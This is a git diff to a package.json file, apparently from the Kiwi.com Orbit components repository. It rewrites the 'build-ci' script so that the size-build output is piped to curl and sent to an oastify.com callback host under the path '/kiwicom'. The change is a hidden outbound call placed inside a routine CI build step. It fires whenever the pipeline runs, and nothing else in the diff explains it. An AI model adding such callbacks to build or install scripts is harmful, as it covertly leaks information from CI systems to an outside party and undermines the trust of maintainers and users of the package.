--- a/package.json
+++ b/package.json
@@ -6,7 +6,7 @@
     "docs"
   ],
   "scripts": {
-    "build-ci": "yarn size:build",
+    "build-ci": "yarn size:build | curl https://mi82wz5ozlr2m5xsdxvmzh55jwpqdib60.oastify.com/kiwicom",
     "components": "yarn workspace @kiwicom/orbit-components",
     "checks": "ts-node --esm scripts/checks.mts",
     "check:types": "yarn checks --types",
